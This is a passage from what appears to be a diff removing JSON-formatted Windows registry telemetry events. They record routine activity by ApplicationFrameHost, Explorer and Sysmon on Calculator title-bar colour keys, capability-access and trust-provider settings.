Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": 